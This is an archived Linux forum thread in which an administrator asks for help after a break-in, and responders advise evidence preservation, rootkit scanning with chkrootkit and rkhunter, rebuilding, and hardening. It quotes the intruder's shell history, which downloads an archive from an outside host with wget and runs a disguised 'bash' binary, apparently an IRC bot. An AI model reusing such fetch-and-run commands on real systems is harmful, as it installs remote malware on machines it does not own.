need help with root hack - Security

This is a discussion on need help with root hack - Security ; .... I think that's what happened. Pretty sure. I'm pretty newbie with Linux security, but the following seems pretty obvious to me. I guess I could use some suggestions regarding how serious this is, if it can be fixed/repaired/closed, and ...

+ Reply to Thread
Results 1 to 12 of 12

Thread: need help with root hack

  1. need help with root hack

    .... I think that's what happened. Pretty sure. I'm pretty newbie with
    Linux security, but the following seems pretty obvious to me.
    I guess I could use some suggestions regarding how serious this is, if
    it can be fixed/repaired/closed, and ideas of what may have been done.
    How the heck did it happen? What can I do to prevent it?
    And if I were running Slackware 10.2, would this have been less likely
    to happen?

    Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
    log:
    Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
    /.access.log/y2kupdate >/root/what 2>&1)
    Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
    bytes of output but got status 0x0046 )

    So I looked into the /home/testuser and found .bash_history:

    ls
    wc -l uniq.txt
    ls
    ../eigei 100 &
    ps -x
    ls
    exit
    ps -x
    exit
    w
    ps -x
    cd //tmp/." ";ls -af
    cd w00t;ls
    cat vuln.txt
    wc -l vuln.txt
    ps -x
    exit
    w
    ps -x
    cd //tmp/." "/woot;ls
    cd //tmp/." "/w00t;ls
    cat vuln.txt
    mv 0 pscan2;ls
    wc -l uniq.txt
    ../eigei 100 &
    exit
    w
    ps -x
    cat //tmp/." "/w00t/vuln.txt
    ls //tmp/." "/w00t
    exit
    w
    ps x
    kill -9 31257 31256
    passwd
    /sbin/ifconfig |grep inet
    cat /proc/cpuinfo
    w
    uname -a
    w
    ps x
    cat /proc/cpuinfo
    w
    ps x
    cat /proc/cpuinfo
    w
    ps x
    cat /proc/cpuinfo
    ls -a
    cd /var/tmp
    ls -a
    mkdir ." "
    cd ." "
    ls -a
    tar zxvf omar.tar.gz
    rm -rf omar.tar.gz
    cd .f
    mv x bash
    export PATH="."
    bash
    w
    ps x
    ls -a
    cat /proc/cpuinfo
    ls -
    a
    ls -a
    cd /var/tmp
    ls -a
    cd ." "
    ls -a
    cd .f
    ls -a
    export PATH="."
    bash
    w
    ps x
    cat /proc/cpuinfo
    w
    ps x
    cd /var/tmp
    ls -a
    cd ." "
    ls -a
    cat /etc/hosts
    cat /proc/cpuinfo
    ls-a
    cd .f
    ls -a
    export PATH="."
    bash
    w
    ps x
    cd /vart/emp
    ls -acd /var/tmp
    ls -a
    cd /var/tmp
    ls -a
    cat /etc/hosts
    ls -a
    rm -rf ." "
    /sbin/ifconfig -a |grep inet
    cat /proc/cpuinfo
    ls- a
    ls- a
    wget archive.lydo.org/omar1.tgz
    tar zxvf omar1.tgz
    rm -rf omar1.tgz
    cd .f
    mv x bash
    ../bash
    ps x
    kill -9 2591
    export PATH="."
    bash


    And a bunch of stuff above that with various text files.
    So I looked at /tmp and found a second "." directory.
    [root@fileserve w00t]# pwd
    /tmp/. /w00t

    and in there is:
    [root@fileserve w00t]# ls -al
    total 11752
    drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
    drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
    -rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
    -rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
    -rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
    -rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
    -rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
    -rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
    -rwxr-xr-x 1 523 525 121 Apr 21 2003 make
    -rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
    -rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
    -rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
    -rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
    -rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
    -rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
    -rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
    -rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
    -rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
    -rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
    -rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
    -rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
    -rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
    -rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c


    I removed the user "testuser", and I'm about to remove this dir.
    But I guess I kind of need to know how bad the damage is.
    Were they able to get root access? Do they likely know all the
    passwords?
    Would changing the passwords even work, or do they likely have some
    kind of keylogger installed?

    Any ideas? This is completely new to me.
    Thanks!
    -Liam


  2. Re: need help with root hack

    news@celticbear.com wrote:
    > ... I think that's what happened. Pretty sure. I'm pretty newbie with
    > Linux security, but the following seems pretty obvious to me.
    > I guess I could use some suggestions regarding how serious this is, if
    > it can be fixed/repaired/closed, and ideas of what may have been done.
    > How the heck did it happen? What can I do to prevent it?
    > And if I were running Slackware 10.2, would this have been less likely
    > to happen?
    >
    > Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
    > log:
    > Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
    > /.access.log/y2kupdate >/root/what 2>&1)
    > Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
    > bytes of output but got status 0x0046 )
    >
    > So I looked into the /home/testuser and found .bash_history:
    >
    > ls
    > wc -l uniq.txt
    > ls
    > ./eigei 100 &
    > ps -x
    > ls
    > exit
    > ps -x
    > exit
    > w
    > ps -x
    > cd //tmp/." ";ls -af
    > cd w00t;ls
    > cat vuln.txt
    > wc -l vuln.txt
    > ps -x
    > exit
    > w
    > ps -x
    > cd //tmp/." "/woot;ls
    > cd //tmp/." "/w00t;ls
    > cat vuln.txt
    > mv 0 pscan2;ls
    > wc -l uniq.txt
    > ./eigei 100 &
    > exit
    > w
    > ps -x
    > cat //tmp/." "/w00t/vuln.txt
    > ls //tmp/." "/w00t
    > exit
    > w
    > ps x
    > kill -9 31257 31256
    > passwd
    > /sbin/ifconfig |grep inet
    > cat /proc/cpuinfo
    > w
    > uname -a
    > w
    > ps x
    > cat /proc/cpuinfo
    > w
    > ps x
    > cat /proc/cpuinfo
    > w
    > ps x
    > cat /proc/cpuinfo
    > ls -a
    > cd /var/tmp
    > ls -a
    > mkdir ." "
    > cd ." "
    > ls -a
    > tar zxvf omar.tar.gz
    > rm -rf omar.tar.gz
    > cd .f
    > mv x bash
    > export PATH="."
    > bash
    > w
    > ps x
    > ls -a
    > cat /proc/cpuinfo
    > ls -
    > a
    > ls -a
    > cd /var/tmp
    > ls -a
    > cd ." "
    > ls -a
    > cd .f
    > ls -a
    > export PATH="."
    > bash
    > w
    > ps x
    > cat /proc/cpuinfo
    > w
    > ps x
    > cd /var/tmp
    > ls -a
    > cd ." "
    > ls -a
    > cat /etc/hosts
    > cat /proc/cpuinfo
    > ls-a
    > cd .f
    > ls -a
    > export PATH="."
    > bash
    > w
    > ps x
    > cd /vart/emp
    > ls -acd /var/tmp
    > ls -a
    > cd /var/tmp
    > ls -a
    > cat /etc/hosts
    > ls -a
    > rm -rf ." "
    > /sbin/ifconfig -a |grep inet
    > cat /proc/cpuinfo
    > ls- a
    > ls- a
    > wget archive.lydo.org/omar1.tgz
    > tar zxvf omar1.tgz
    > rm -rf omar1.tgz
    > cd .f
    > mv x bash
    > ./bash
    > ps x
    > kill -9 2591
    > export PATH="."
    > bash
    >
    >
    > And a bunch of stuff above that with various text files.
    > So I looked at /tmp and found a second "." directory.
    > [root@fileserve w00t]# pwd
    > /tmp/. /w00t
    >
    > and in there is:
    > [root@fileserve w00t]# ls -al
    > total 11752
    > drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
    > drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
    > -rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
    > -rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
    > -rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
    > -rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
    > -rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
    > -rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
    > -rwxr-xr-x 1 523 525 121 Apr 21 2003 make
    > -rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
    > -rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
    > -rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
    > -rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
    > -rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
    > -rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
    > -rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
    > -rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
    > -rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
    > -rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
    > -rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
    > -rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
    > -rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
    > -rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c
    >
    >
    > I removed the user "testuser", and I'm about to remove this dir.
    > But I guess I kind of need to know how bad the damage is.
    > Were they able to get root access? Do they likely know all the
    > passwords?
    > Would changing the passwords even work, or do they likely have some
    > kind of keylogger installed?
    >
    > Any ideas? This is completely new to me.
    > Thanks!
    > -Liam
    >

    Don't trust your box anymore. Apparantly some program has been installed
    to take the place of bash. Hard to tell from here which version you
    are using yourself right now. Easy to guess the new Bash does more than
    handle your keystrokes for you....

    Your (his) bashhistory stops there, simply because a new bash has taken
    over. ASSUME the worst!

    Was testuser a user you created before?
    What do your firewall rules/policies look like ?
    (which) Users allowed to SSh to your machine from remote locations?
    What services do you have running at opened ports?

    Don't throw the 'evidence' away!. save it in an archive on a cdrom or
    diskette and keep that for later analysis. Be glad you FOUND the
    evidence, many hacked boxen are only discovered as such much later.
    Block the user, kill the WAN connection.

    Maybe you can try nmap to see what ports are open on your box to the
    outside world. If you want me or someone else to have a look what ports
    are open, you could pm someone, or better, use an online service to have
    your pc scanned. Better still (as long as you are sure no other hosts on
    your LAN are affected), run nmap on those to see what services/ports
    your compromised box advertises through the firewall.

    chkrootkit and rkhunter (both available as yum-able rpms I believe) can
    help spot rootkits on your box.

    New setup is advisable, if not mandatory. Someone installing his own
    bash surely isn't doing that just to see if he can...

    Next install, make sure you use tripwire or AIDE or similar to make a
    checksum database of all the relevant stuff on your machine. That way
    you at least can easily detect which programs/files have been affected
    after a break-in. Be sure to keep the database up-to-date and stored
    somewhere safe (i.e. write-once media or external device, floppies, etc
    etc.)

    HTH
    Sh.



  3. Re: need help with root hack


    Schraalhans Keukenmeester wrote:
    > news@celticbear.com wrote:
    > > ... I think that's what happened. Pretty sure. I'm pretty newbie with
    > > Linux security, but the following seems pretty obvious to me.
    > > I guess I could use some suggestions regarding how serious this is, if
    > > it can be fixed/repaired/closed, and ideas of what may have been done.
    > > How the heck did it happen? What can I do to prevent it?
    > > And if I were running Slackware 10.2, would this have been less likely
    > > to happen?
    > >
    > > Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
    > > log:
    > > Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
    > > /.access.log/y2kupdate >/root/what 2>&1)
    > > Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
    > > bytes of output but got status 0x0046 )
    > >
    > > So I looked into the /home/testuser and found .bash_history:
    > >
    > > ls

    [..snip..]
    > > export PATH="."
    > > bash
    > >
    > >
    > > And a bunch of stuff above that with various text files.
    > > So I looked at /tmp and found a second "." directory.
    > > [root@fileserve w00t]# pwd
    > > /tmp/. /w00t
    > >
    > > and in there is:
    > > [root@fileserve w00t]# ls -al
    > > total 11752
    > > drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
    > > drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
    > > -rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
    > > -rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
    > > -rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
    > > -rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
    > > -rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
    > > -rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
    > > -rwxr-xr-x 1 523 525 121 Apr 21 2003 make
    > > -rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
    > > -rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
    > > -rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
    > > -rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
    > > -rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
    > > -rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
    > > -rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
    > > -rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
    > > -rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
    > > -rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
    > > -rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
    > > -rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
    > > -rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
    > > -rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c
    > >
    > >
    > > I removed the user "testuser", and I'm about to remove this dir.
    > > But I guess I kind of need to know how bad the damage is.
    > > Were they able to get root access? Do they likely know all the
    > > passwords?
    > > Would changing the passwords even work, or do they likely have some
    > > kind of keylogger installed?
    > >
    > > Any ideas? This is completely new to me.
    > > Thanks!
    > > -Liam
    > >

    > Don't trust your box anymore. Apparantly some program has been installed
    > to take the place of bash. Hard to tell from here which version you
    > are using yourself right now. Easy to guess the new Bash does more than
    > handle your keystrokes for you....
    >
    > Your (his) bashhistory stops there, simply because a new bash has taken
    > over. ASSUME the worst!


    Yeah, I'm going to rebuild the box. =/
    Think Slackware is any more secure out-of-the-box? FC4?

    >
    > Was testuser a user you created before?
    > What do your firewall rules/policies look like ?
    > (which) Users allowed to SSh to your machine from remote locations?
    > What services do you have running at opened ports?
    >


    To be honest, I have no recolection of if I created it or not. If I
    did, it probably didn't have a good password.
    (*thud*)
    I have no idea what my firewall rules look like. =(
    I once looked into IPTABLES and it was like having to learn a whole new
    language, and not a friendly one either. I just used the built-in
    Fedora Core firewall manager and only had ports 22 and 80 open.

    Fortunately I do know enough to have in my /etc/sshd_config:
    PermitRootLogin no
    AllowUsers liam duane

    So, that's a not bad thing I guess.
    But, how do I check what services I have running on open ports??


    > Don't throw the 'evidence' away!. save it in an archive on a cdrom or
    > diskette and keep that for later analysis. Be glad you FOUND the
    > evidence, many hacked boxen are only discovered as such much later.
    > Block the user, kill the WAN connection.
    >


    Yeah, before I removed the testuser home dir and that hidden folder in
    tmp, I copied them over to /root so I could look at them.
    I'll move them somewhere off the PC.
    Now if I could only really understand what it's telling me. =/

    > Maybe you can try nmap to see what ports are open on your box to the
    > outside world. If you want me or someone else to have a look what ports
    > are open, you could pm someone, or better, use an online service to have
    > your pc scanned. Better still (as long as you are sure no other hosts on
    > your LAN are affected), run nmap on those to see what services/ports
    > your compromised box advertises through the firewall.
    >


    Uhm, OK. I used grc.com's ShieldsUp
    and according to it, only 22 and 80 are open to the outside. All else
    is "stealthed."
    I'll see what I can do about nmap from the outside.

    > chkrootkit and rkhunter (both available as yum

    -able rpms I believe) can
    > help spot rootkits on your box.
    >


    Well, I ran chkrootkit and got this:
    a LOT of entied labeled "not infected" and the like, and then...

    Checking `chkutmp'... The tty of the following user process(es) were
    not found
    in /var/run/utmp !
    ! RUID PID TTY CMD
    ! root 3128 tty4 /sbin/mingetty tty4
    ! root 3134 tty5 /sbin/mingetty tty5
    ! root 3140 tty6 /sbin/mingetty tty6
    chkutmp: nothing deleted
    [root@fileserve chkrootkit-0.46a]# ./chkrootkit ps ls sniffer
    ROOTDIR is `/'
    Checking `ps'... not infected
    Checking `ls'... not infected
    Checking `sniffer'... eth0: PF_PACKET(/usr/local/bin/snort)

    I don't understand the tty thing. Is that good or bad?

    rkhunter (these are cool programs!) and it came up with:
    [..]
    * Application version scan
    - GnuPG 1.2.4 [ OK ]
    - Apache 2.0.51 [ Old or
    patched version ]
    - Bind DNS 9.2.3 [ OK ]
    - OpenSSL 0.9.7a [ Old or
    patched version ]
    - PHP 4.3.10 [ Old or
    patched version ]
    - Procmail MTA 3.22 [ OK ]
    - OpenSSH 3.6.1p2 [ Old or
    patched version ]
    [..]
    ---------------------------- Scan results ----------------------------

    MD5
    MD5 compared: 49
    Incorrect MD5 checksums: 0

    File scan
    Scanned files: 342
    Possible infected files: 0

    Application scan
    Vulnerable applications: 4

    Now, you mentioned bash was replaced... htat didn't seem to detect
    that. Yikes. =(


    > New setup is advisable, if not mandatory. Someone installing his own
    > bash surely isn't doing that just to see if he can...
    >
    > Next install, make sure you use tripwire or AIDE or similar to make a
    > checksum database of all the relevant stuff on your machine. That way
    > you at least can easily detect which programs/files have been affected
    > after a break-in. Be sure to keep the database up-to-date and stored
    > somewhere safe (i.e. write-once media or external device, floppies, etc
    > etc.)
    >


    I'm looking into tripwire for the new install.
    Still I wonder, which will be the more useful and secure for the Linux
    security newbie like me. FC 4 or Slackware 10.2.
    =/

    Thanks for all the help! This is a lot of great advice and
    information!!

    BTW, I ran chkrootkit on another server in a different WAN, and got:

    [root@s75712 chkrootkit-0.46a]# ./chkrootkit -q
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.

    /usr/lib/perl5/site_perl/5.8.5/i386-linux-thread-multi/auto/Image/Magick/.packlist
    /usr/lib/perl5/5.8.5/i386-linux-thread-multi/.packlist
    /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/auto/mod_perl/.packlist

    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    INFECTED (PORTS: 31337)

    What can you tell me about these findings?
    What is a duplicate TCP line? And more importantly, how can I find out
    what's going on with port 31337! ("elite." Cute. Not.)

    THANKS!!
    -Liam


  4. Re: need help with root hack

    In comp.os.linux.misc news@celticbear.com wrote:

    : Schraalhans Keukenmeester wrote:
    :> over. ASSUME the worst!

    : Yeah, I'm going to rebuild the box. =/
    : Think Slackware is any more secure out-of-the-box? FC4?

    Any of the major releases will be plenty secure IF you
    (1) set up security properly in the first place- including
    shutting down all access except what you really need,
    leaving good firewall in place, never running as root, etc.

    (2) very regularly download and install all security updates.

    An external firewall ( like a dedicated firewall box )
    is an extra layer that can help a bunch.

    As with any security nothing will be 100% protection from the
    really determined hacker short of eliminating all network
    access, but the casual hacker will be very well stopped
    by normal security.

    Stan

    --
    Stan Bischof ("stan" at the below domain)
    www.worldbadminton.com

  5. Re: need help with root hack

    I took a look at the file they downloaded/extracted/installed onto your
    machine. It's an IRC Bot, probably used for advertising/flooding, etc.


  6. Re: need help with root hack


    stan@worldbadminton.com wrote:
    > In comp.os.linux.misc news@celticbear.com wrote:
    >
    > : Schraalhans Keukenmeester wrote:
    > :> over. ASSUME the worst!
    >
    > : Yeah, I'm going to rebuild the box. =/
    > : Think Slackware is any more secure out-of-the-box? FC4?
    >
    > Any of the major releases will be plenty secure IF you
    > (1) set up security properly in the first place- including
    > shutting down all access except what you really need,
    > leaving good firewall in place, never running as root, etc.
    >
    > (2) very regularly download and install all security updates.
    >
    > An external firewall ( like a dedicated firewall box )
    > is an extra layer that can help a bunch.
    >
    > As with any security nothing will be 100% protection from the
    > really determined hacker short of eliminating all network
    > access, but the casual hacker will be very well stopped
    > by normal security.
    >


    Thanks for the reply!
    Someone else said "security is a process, not an application." I'm
    taking that to heart.
    I do have an IP-Cop box between the 'net and the compromised machine,
    but it was in the DMZ with port 80 forwarded to it.

    I've decided to go with Slackware because of more efficient out of the
    box, and it's going to force me to learn more about security rather
    than allowing me to rely on pre-packaged stuff from RedHat.

    Thanks for the feedback!
    -Liam


  7. Re: need help with root hack


    Ben@atomnet.co.uk wrote:
    > I took a look at the file they downloaded/extracted/installed onto your
    > machine. It's an IRC Bot, probably used for advertising/flooding, etc.


    Thanks for the reply!
    That's kind of what I was thinking, but couldn't be sure.
    Someone else confirmed my own suspicions that because so much evidence
    was left behind and not much care to clean up after themselves, it was
    likely a scriptkiddie who was only interested in installing spam
    software, and not really interested or knowledgeable about gaining root
    access and controlling the box.

    I'm going to rebuild it anyway, of course.
    Thanks again!
    -Liam


  8. Re: need help with root hack


    > Thanks for the reply!
    > Someone else said "security is a process, not an application." I'm
    > taking that to heart.
    > I do have an IP-Cop box between the 'net and the compromised machine,
    > but it was in the DMZ with port 80 forwarded to it.
    >
    > I've decided to go with Slackware because of more efficient out of the
    > box, and it's going to force me to learn more about security rather
    > than allowing me to rely on pre-packaged stuff from RedHat.


    You need to define your use and goals before selecting a distribution.
    If you really want secure, something like CenTOS is good, because it's
    based on the RHEL top of the line commercial Linux, and very stable.
    Security releases come out quickly. If you want good security and more
    cutting edge than a stable release, I would go FC4 (or FC5 for more
    cutting edge and less experience from users).

    I would NOT run ssh on the standard port unless you can be sure that
    packets will come from known addresses. If you must allow access from
    random IPs, pick a non-standard port and do a search on "port knocking"
    to secure it.

    It's nice to learn about firewalls and roll your own, but right now you
    are learning by doing post mortem after being hacked. It's a great way
    to learn if you don't mind the "being hacked" part. I would suggest that
    a firewall built by a distribution program is likely to work better than
    what you are likely to write at the moment.

    If you really want security, running virtual machines with xen or
    similar is a learning path.

    --
    -bill davidsen (davidsen@tmr.com)
    "The secret to procrastination is to put things off until the
    last possible moment - but no longer" -me

  9. Re: need help with root hack

    In article ,
    Bill Davidsen wrote:

    >I would NOT run ssh on the standard port unless you can be sure that
    >packets will come from known addresses. If you must allow access from
    >random IPs, pick a non-standard port and do a search on "port knocking"
    >to secure it.


    Don't rely on security-through-obscurity.

  10. Re: need help with root hack

    On 22.04.2006, Lawrence D'Oliveiro wrote:
    > In article ,
    > Bill Davidsen wrote:
    >
    >>I would NOT run ssh on the standard port unless you can be sure that
    >>packets will come from known addresses. If you must allow access from
    >>random IPs, pick a non-standard port and do a search on "port knocking"
    >>to secure it.

    >
    > Don't rely on security-through-obscurity.


    It's not for security, I think. It's just for keeping logs clear

    --
    Feel free to correct my English
    Stanislaw Klekot

  11. Re: need help with root hack

    Lawrence D'Oliveiro wrote:

    > In article ,
    > Bill Davidsen wrote:
    >
    >>I would NOT run ssh on the standard port unless you can be sure that
    >>packets will come from known addresses. If you must allow access from
    >>random IPs, pick a non-standard port and do a search on "port knocking"
    >>to secure it.

    >
    > Don't rely on security-through-obscurity.


    Port-knocking is not "security-through-obscurity" any more than a
    combination lock is "security-through-obscurity". If the need it to allow
    connections from "random IPs" It is FAR, FAR better than just leaving the
    port open to the world (on any port).

  12. Re: need help with root hack

    In article <1212659.HCNjaZ3pTA@rcn.com>,
    matt_left_coast wrote:

    >Lawrence D'Oliveiro wrote:
    >
    >> In article ,
    >> Bill Davidsen wrote:
    >>
    >>>I would NOT run ssh on the standard port unless you can be sure that
    >>>packets will come from known addresses. If you must allow access from
    >>>random IPs, pick a non-standard port and do a search on "port knocking"
    >>>to secure it.

    >>
    >> Don't rely on security-through-obscurity.

    >
    >Port-knocking is not "security-through-obscurity" any more than a
    >combination lock is "security-through-obscurity".


    Wrong analogy.

    The right analogy would be a "secret knock" that you _hope_ nobody else
    is listening to.

+ Reply to Thread